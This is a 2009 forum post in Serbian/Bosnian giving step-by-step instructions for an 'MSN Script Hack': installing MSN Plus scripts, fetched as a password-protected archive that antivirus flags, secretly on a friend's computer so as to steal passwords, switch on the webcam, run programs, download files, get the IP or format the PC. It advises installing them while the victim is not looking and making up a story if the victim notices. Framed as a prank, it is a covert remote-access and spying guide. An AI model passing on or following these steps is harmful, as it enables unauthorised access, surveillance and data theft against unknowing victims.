View Single Post
Old 01-02-2009   #249
tmusa
tmusa
Dobar
 
tmusa's Avatar
 
Join Date: Feb 2008
Location: SJENICA
Godine: 34
Posts: 990
Default

Ok Resko kazi lepo necu da ti kazem i kraj...Ti znas da sam ja fin momak ja nebi koristio u glupe svrhe ali ok necu da te molim...Ja bi samo jednu dobru foru prico sam ti na msn sta zelim da radim preko neta....Nego evo jos jedna luda stvar ko ume da se sali


Ovo je iskljucivo da zezate nekog od prijatelja, da se malo prodrmaju. Naravno ja cu vam reci ultimativni nacin preko kojeg vas nikada nece otkriti.

Sta moze skripta:
- Steal password
- Turn on webcam
- request remote assistance
- download files to PC
- run programs on victims computer
- open audio conversation
- mess with mouse
- change MSN name / PM
- change status
- sign them out of MSN
- open cd drive(s)
- get IP
- format pc
etc


Takodje napominjem ukoliko sve izvedete kako treba zrtva ne bi trebala da vidi komandu koju ste upisali osim kada trzite da vam posalje chat log, tada smutite pricu da vam je PC poludio i da uzima neka cookies-e sa Google-a

MSN Script Hack



Ovako ovo je jednostavno da bi i moja baka skontala.

Treba vam:
1. Vas MSN koji ima u sebi MSN Plus koji odgovara toj verziji
2. Zrtva Mora da ima MSN i MSN Plus koji odgovara toj verziji
3. Vase dvije skripte
4. Jedna skripta za zrtvu
5. Malo maste kako da poblijedi

Koraci

1. Ukoliko nemate skinite MSN Plus sa:

http://www.msgplus.net/download/

2. Kada potvrdite da MSN Plus radi onda morate skinuti ovaj rar:

Quote:
http://www.megaupload.com/?d=G80LRO6H


Pasword
www.svezadz.com

3. Sada kada ekstraktujete imate Folder i unutra dva foldera

iz "You install these two" instalirajte obje skripte (Avast zna ovu skriptu prijaviti kao virus)

iz foldera "You install" mora da se instalira bar jedna skripta (ja radim preko HuHu Clone)
znam da su folderi sa zbrkanim imenima ali ako ste sve uspjesno obavili znaci da ste procitali moj post i necete vi biti zrtva

------ Sada ovo vam je predlog. Najbolje je da odete kod svoga druga/rice ili koga vec hocete i instalirate mu da on ne vidi tako nece znati da ste vi mu postavili skripte. Ili ako znate smutiti neku pricu samo izvolite ja znam kako ja radim

Primjena je jednostavna samo odaberite dugme gdje su skripte u prozoru za razgovor (tri kockice razlicitih boja) i odaberite skriptu i opciju (moja draza je Controler 1.33)

Sva pitanja uputite mi preko PP-a ili
mozete traziti jos hakova preko MSN-a

Uzivajte i BTW nemojte mu formatirat PC
__________________
Kod carobnog stapica nije bitna duzina vec MAGIJA

tmusa is offline   Reply With Quote